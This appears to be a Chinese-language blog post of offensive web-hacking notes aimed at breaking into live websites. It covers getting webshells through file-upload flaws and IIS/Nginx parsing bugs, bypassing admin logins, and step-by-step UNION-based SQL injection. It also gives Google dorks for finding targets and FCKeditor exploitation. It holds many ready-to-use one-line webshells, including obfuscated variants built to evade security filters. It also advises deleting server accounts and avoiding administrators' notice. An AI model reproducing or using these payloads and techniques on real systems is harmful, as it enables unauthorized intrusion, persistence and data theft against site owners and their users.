渗透测试笔记汇总_渗透测试怎么做

【 拿shell 】
1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马，不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls
2.上传图片木马遇到拦截系统，连图片木马都上传不了，记事本打开图片木马在代码最前面加上gif89a，一般就能逃过拦截系统了。
3.上传图片木马把地址复制到数据库备份里备份成asp木马，有时不成功就利用IIs6.0解析漏洞尝试突破。
4.上传图片木马再用抓包工具进行抓包，用明小子的综合上传功能，复制上传地址及cookies填到对应的框里，点击上传即可。
5.当后台有数据库备份蛋没有上传点时，把一句话木马插到任意处，再到数据库备份里备份成asp木马，之后用一句话客户端连接木马即可。

6.后台点击修改密码，新密码设置为：1″:eval request(“h”)’设置成功后连接asp/config.asp即可拿下shell
7.当页面提示“上传格式不正确[重新上传]” 则说明存在上传漏洞，复制地址放到明小子里上传，一般都能直接拿下shell。
8.当后台没有数据库备份但有数据库恢复的情况下，请不要犹豫，数据库恢复跟数据库备份功能是一样的，直接邪恶吧。
9.如果知道网站的数据库是asp的，直接在前台找留言板插入一句话木马，连接配置文件inc/config.asp即可拿下shell。
10.当网站前台有“会员注册” 注册一个账户进去看看有没有上传点，有的话直接上传asp木马以及利用iis6.0解析漏洞，不行就抓包用明小子上传。
11.先上传一个.ashx的文件，在笔记里搜索可找到方法，结果是访问会生成一句话木马文件，后台上传、编辑器上传、上传漏洞页面均可使用此方法。
12.当页面提示只能上传jpg|gif|png等格式的时候，右键查看源文件，本地修改为asp|asa|php再本地上传即可拿下shell。
13.当用啊D检测注入点提示SA权限或DB权限的时候，尝试列目录找到网站物理路径，再点击cmd/上传，直接上传asp木马即可，不行就差异备份拿shell。
14.对于一些上传漏洞的上传页面，以及后台找到的上传页面，可以尝试用本地双文件上传突破，第一个选jpg第二个选cer，推荐使用火狐浏览器。
【 渗透技巧 】

1.某些cms的网站设置过滤不严，直接在网站后面加上admin/session.asp 或 admin/left.asp 可以绕过后台验证直接进去后台。
2.提下服务器之后建议抓下管理员哈希值，然后删除所有用户包括自己的，以后登录这台服务器就用管理员的账号密码登录，这样比较安全。
3.入侵网站之前连接下3389，可以连接上的话先尝试弱口令，不行就按5次shift键，看看有没有shift后门。
4.访问后台地址时弹出提示框“请登陆” 把地址记出来(复制不了)放到“网页源代码分析器”里，选择浏览器-拦截跳转勾选–查看即可直接进入后台。
5.突破防盗链系统访问shell代码：javascript:document.write(“<a href=’http://www.xxx.com/uploadfile/1.asp’>fuck</a>”) 点击GO即可进入shell。
6.遇到一流信息监控拦截系统时，上传图片木马或是在木马代码最前面加上gif89a即可逃过检测。
7.eweb编辑器后台，增加了asp|asa|cer|php|aspx等扩展名上传时都被过滤了，尝试增加一个aaspsp，再上传asp就会解析了。
8.用注入工具猜解到表段却猜解不到字段的时候，到网站后台右键查看源文件，一般账号密码后面的就是字段，之后在注入工具里添加字段进行猜解即可。
9.当注入工具猜解表段，但猜解字段时提示长度超过50之类，不妨扔到穿山甲去猜解一下。
10.得知表段跟字段之后，使用SQL语句在ACCESS数据库里加个用户名及密码的语句：Insert into admin(user,pwd) values(‘jianmei’,’daxia’)
11.当获得管理员密码却不知道管理员帐号时，到网站前台找新闻链接，一般“提交者”“发布者”的名字就是管理员的帐号了。
12.爆破ASP+IIS架设的网站web绝对路径，假设网站主页为：http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/，fkbhvv.aspx是不存在的。
13.有的站长很懒什么也不改，当我们得知网站的cms的时候，不妨去下载一套找找数据库路径，以及敏感信息，再尝试默认相关的可利用资源。
14.菜刀里点击一句话木马右键，选择虚拟机终端，执行命令出现乱码时，返回去设置编码那里，将默认的GB2312改为UTF-8.
15.入侵千万别忘了ftp，试试诺口令，ftp的默认端口：21  默认帐号密码：test
16.激活成功教程出md5为20位结果，只需要把前三位和后一位去掉，剩余16位拿去解密即可
17.好多网站的后台地址是：admin_index.asp manage_login.asp
18.有时在木马代码里加上了gif89a，上传成功访问的时候却出现了像图片一样的错误图像，说明服务器把gif89a当做图片来处理了，不要带gif89a即可。问就可以了。
19.找eweb编辑器的时候，如果默认的被改了，到前台去找图片右键看下路径，根据图片的目录猜eweb编辑器的目录，后台也是用此思路。
20.IIS注册表全版本泄漏用户路径和FTP用户名漏洞：HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\  
21.扫旁站的时候，是不是想看每个站点是什么cms呢？用轩辕剑扫描就可以显示系统特征。
22.网站的主站一般都很安全，这时就要旁注或C段了，但是想知道各个IP段开放了什么端口吗？用“啊D网络工具包”里面的IP端口扫描最理想了。
23.手工检测注入点弹出“你的操作已被记录!”之类的信息，访问这个文件：sqlin.asp，如果存在，在注入点后面植入一句话木马：‘excute(request(“TNT”))
接着用一句话木马客户端连接：http://www.xxx.com/sqlin.asp，上传木马即可拿下shell，因为很多防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库。
24.有的后台不显示验证码，往注册表里添加一个ceg即可突破这个困境了，把下面的代码保存为Code.reg，双击导入就可以了。
REGEDIT4 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 
“BlockXBM”=dword:00000000 
25.内网渗透时尽量少登录3389，以免被管理员发现；
26.旁注的时候，建议挑php的站点来日，因为php站点一般都支持aspx脚本，这样对于提权跟跨目录都轻松.!
【 手工注入 】
IE浏览器-工具-Internet选项-高级-显示友好HTTP错误信息前面的勾去掉，否则不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的信息。
手工注入时如果网站过滤了 and 1=1  and 1=2 ，可以用xor 1=1  xor 1=2 进行判断。

第一步：找注入点
（数字型）http://www.xxx.com/show.asp?id=7
加’           程序报错
加and 1=1     返回正常页面
加and 1=2     返回错误页面

（字符型）http://www.xxx.com/show.asp?id=ade7
加’            程序报错
加’and ‘1’=’1  返回正常页面
加’and ‘1’=’2  返回错误页面

新型检测注入点的方法：
在URL地址后面加上-1，若返回的页面和前面不同，是另一个正常的页面，则表示存在注入漏洞，而且是数字型的注入漏洞。
在URL地址后面加上-0，若返回的页面和之前的页面相同，然后加上-1，返回错误页面，则也表示存在注入漏洞，而且是数字型的。

如果报错提示这个：
Microsoft JET Database Engine 错误 ‘80040e14’ 
语法错误 (操作符丢失) 在查询表达式 ‘ID = 6 ord by’ 中。 
/fun/Function.asp，行 657

解明：通过 JET 引擎连接数据库，则是 Access数据库，通过 ODBC 引擎连接数据库，则是 MSSQL数据库。

第二步：猜字段数
语句：order by 5
如果猜6的时候返回出错，就继续往回猜，直到返回正确为止…

第三步：UNION命令
语句：and 1=2 union select 1,2,3,4,5–
看看哪里可以替换，假如显示有2，就在2这里替换SCHEMA_NAME，见下

第三步：猜库名
语句：and 1=2 union select 1,SCHEMA_NAME,3,4,5 from information_schema.SCHEMATA limit 1,1

第四步：猜表段
语句：and 1=2 union select 1,TABLE_NAME,3,4,5 from information_schema.TABLES where TABLE_SCHEMA=0x68667A7338383838 limit 1,1
注意，TABLE_SCHEMA=后面的库名必须是hex转换过的格式，倒数第二个1一直替换，直到爆出所有表段，然后选最可能性的那个。

第五步：猜字段
and 1=2 union select 1,COLUMN_NAME,3,4,5 from  information_schema.COLUMNS where TABLE_NAME=0x615F61646D696E limit 1,1
注意，TABLE_SCHEMA=后面的表段必须是hex转换过的格式，倒数第二个1一直替换，直到爆出所有字段，然后选最可能性的那两个。

第六步：猜内容
语句一：and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin
首先让程序报错，所以在注入点后面加上 and 1=2
语句二：http://www.xxx.com/show.asp?id=-178 union select 1,2,3,4,5,6,7,8,9,10,11,12 from admin
同样是先让程序报错，在178这个参数前面加上 –
当列名帐号跟列名密码都猜解对的时候，页面将会显示相对应的内容，一般的密码都经过MD5加密了，解密地址：http://www.chamd5.org/;（朋友的站打个广告）  UserName  Password
【 常见网站程序 】
asp类：
foosun(风讯)
kesion(科汛)

newasp(新云)
乔客

CreateLive(创力)
5uCMS

KingCMS
    
DvBBS(动网) 
BBSxp

[博客]zblog
[博客]pjblog

PHP类： 
DeDeCms（织梦）
ECMS（帝国）

PHPCMS
PHP168
HBcms（宏博）

SupeSite
CMSware(思维)

Joomla!
    
[BBS]Discuz!
[BBS]phpWind

[SNS]UCenterHome
[SNS]ThinkSNS

[商城]EcShop
[商城]ShopEx

[博客]WordPress   

[维基]HDWiki
[微博]PHPsay

[DIGG]PBdigg

( php开源mysql绝对路径 )
开源系统             数据库配置文件名                  文件名所在的目录
Discuz!              config.inc.php                    ./ config.inc.php
Phpcms               config.inc.php                    ./include/config.inc.php
Wodpress             wp-config.php                     ./ wp-config.php
Phpwind              sqlconfig.php                     ./data/sqlconfig.php
phpweb               config.inc.php                    ./config.inc.php
Php168v6             mysql_config.php                  ./php168/ mysql_config.php
Shopex               config.php                        ./config/config.php
Ecshop               config.php                        ./data/config.php
Joomla               configuration.php                 ./ configuration.php
UCenter              config.inc.php                    ./data/config.inc.php
EmpireCMS            config.php                        ./e/class/config.php
Dedecms              common.inc.php                    .data/common.inc.php
Zen Cart             configure.php                     ./includes/configure.php
Mediawiki            localsettints.php                 ./config/localsettints.php
Ecshop               config.php                        ./data/config.php
osCommerce           configure.php                     ./includes/configure.php

【 谷歌黑客语法 】
site：可以限制你搜索范围的域名.
inurl：用于搜索网页上包含的URL，这个语法对寻找网页上的搜索，帮助之类的很有用.
intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题、URL等的文字)
intitle: 查包含关键词的页面，一般用于社工别人的webshell密码
filetype：搜索文件的后缀或者扩展名
intitle：限制你搜索的网页标题.
link: 可以得到一个所有包含了某个指定URL的页面列表.
查找后台地址：site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms
查找文本内容：site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username
查找可注入点：site:域名 inurl:aspx|jsp|php|asp
查找上传漏洞：site:域名 inurl:file|load|editor|Files
找eweb编辑器：site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit
存在的数据库：site:域名 filetype:mdb|asp|#
查看脚本类型：site:域名 filetype:asp/aspx/php/jsp
迂回策略入侵：inurl:cms/data/templates/images/index/ 
利用谷歌黑客快速找到自己想要的资料：site:qiannao.com 提权视频
【 一句话木马 】
asp一句话木马：<%eval request(“x”)%>
php一句话木马：<?php eval($_POST[g]);?>
aspx一句话：<%@ Page Language=”Jscript”%><%eval(Request.Item[“x”],”unsafe”);%>
数据库加密一句话(密码a)：┼攠數畣整爠煥敵瑳∨≡┩愾
网站配置、版权信息专用一句话：”%><%Eval Request(x)%>
一句话再过护卫神：<%Y=request(“x”)%> <%execute(Y)%>
过拦截一句话木马：<% eXEcGlOBaL ReQuEsT(“x”) %>
asp闭合型一句话 %><%eval request(“0o1Znz1ow”)%><%
能过安全狗的解析格式：;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg
突破安全狗的一句话：<%Y=request(“x”)%> <%eval(Y)%>
elong过安全狗的php一句话：<?php  $a = “a”.”s”.”s”.”e”.”r”.”t”;  $a($_POST[cc]);  ?>

后台常用写入php一句话（密码x）：
<? 
$fp = @fopen(“c.php”, ‘a’); 
@fwrite($fp, ‘<‘.’?php’.”\r\n\r\n”.’eval($_POST[x])’.”\r\n\r\n?”.”>\r\n”); 
@fclose($fp); 
?>

高强度php一句话：
<?php substr(md5($_REQUEST[‘heroes’]),28)==’acd0’&&eval($_REQUEST[‘c’]);?>

新型变异PHP一句话(密码b4dboy):
($b4dboy = $_POST[‘b4dboy’]) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);

突破安全狗的aspx一句话：
<%@ Page Language=”C#” ValidateRequest=”false” %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“你的密码”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

突破护卫神，保护盾一句话：
<?php $a = str_replace(x,””,”axsxxsxexrxxt”);
$a($_POST[“test”]); ?>

许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传，这样一句话木马就写入不进数据库了。
改成：〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script〉
这样就避开了使用〈%%〉，保存为.ASP,程序照样执行的效果是一样的。

PHP高强度一句话：
<?php substr(md5($_REQUEST[‘x’]),28)==’acd0’&&eval($_REQUEST[‘c’]);?>   菜刀连接：/x.php?x=lostwolf  脚本类型：php  密码：c
<?php assert($_REQUEST[“c”]);?>    菜刀连接 躲避检测 密码：c
【 解析漏洞总结 】
IIS 6.0
目录解析：/xx.asp/xx.jpg  xx.jpg可替换为任意文本文件(e.g. xx.txt)，文本内容为后门代码
IIS6.0 会将 xx.jpg 解析为 asp 文件。
后缀解析：/xx.asp;.jpg     /xx.asp:.jpg(此处需抓包修改文件名)
IIS6.0 都会把此类后缀文件成功解析为 asp 文件。
默认解析：/xx.asa    /xx.cer   /xx.cdx
IIS6.0 默认的可执行文件除了 asp 还包含这三种
此处可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg

IIS 7.0/IIS 7.5/Nginx <8.03
在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。
常用利用方法： 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后，避免破坏图片文件头和尾 
e.g.  
copy xx.jpg/b + yy.txt/a xy.jpg
/b 即二进制[binary]模式
/a 即ascii模式 xx.jpg正常图片文件 
yy.txt 内容 <?PHP fputs(fopen(‘shell.php’,’w’),'<?php eval($_POST[cmd])?>’);?>
意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称为shell.php的文件
找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址，在地址后加上 /xx.php 即可执行恶意文本
.然后就在图片目录下生成一句话木马 shell.php 密码 cmd
【 fckeditor编辑器 】
查看版本：fckeditor/editor/dialog/fck_about.html         
编辑器页面：FCKeditor/_samples/default.html
上传页面：fckeditor/editor/filemanager/connectors/test.html
遍历目录：FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
编辑页面：fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
查看文件上传路径：fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=

( 拿shell方法总结 )
ASPX的站几乎都用fck编辑器，建议用工具扫一下，记住inc目录下可能存在fck编辑器，扫下这个目录。
一：如果是iis6.0，上传两次 1.asp;.jpg 或者1.asp;1.jpg 或者创建x.asp目录，再在这个目录下上传x.jpg 或者直接上传1.asp;jpg 都可以完美解析拿下shell
二：第一次上传1.asp;1.jpg，被重命名为：1_asp;1.jpg，但是第二次上传1.asp;1.jpg，就有可能变成：1.asp;1(1).jpg
三：iis7.5+fck的解析文件为：a.aspx.a;.a.aspx.jpg..jpg.aspx
四：如果不是iis6.0 上传1.asp;jpg然后抓包，接下来改包，将分号变成空格，再用c32把20改成00，保存，利用%00 截断分号两次
五：成功访问别人的一句话木马页面，http://xxx.com/UploadFiles\EditorFile\file/2.asp;2(1).jpg  但不知道密码
http://xxx.com/UploadFiles\EditorFile\file\2_asp;2.jpg 这个是图片木马，没有成功利用iis6.0解析漏洞还是图片，下载下来用记事本打开找到密码。
六：IIS7.0/7.5 通杀oday，把php一句话木马后缀改成1.jpg传上去，找出一句话的路径后，在1.jpg的后面添加/.php 
( 建立文件夹 . 变 _ 的突破方法 )
利用Fiddler web debugger 这款工具来进行修改数据包，从而达到突破的目的。
注意：安装Fiddler web debugger，需要安装.net环境以及.net的SP2补丁方可运行！
1.打开fck的上传页面，例如：fckeditor/editor/filemanager/browser/default/connectors/test.html
2.再打开Fiddler web debugger这款工具，点击设置–自动断点–选择 “请求之前”
3.接着打开fck的上传页面，创建文件夹，并输入你想要创建的文件名，例如：x.asp
4.然后返回到Fiddler web debugger这款工具里，选择链接–点击右侧的嗅探
5.修改currentfolder内的参数，改成你要建立的文件夹名字，如：x.asp
6.然后点击右侧的：run to completion
7.再点击软件设置–自动断点–禁用，再到浏览器里点击确定建立文件夹，你就会发现文件夹建立为x.asp了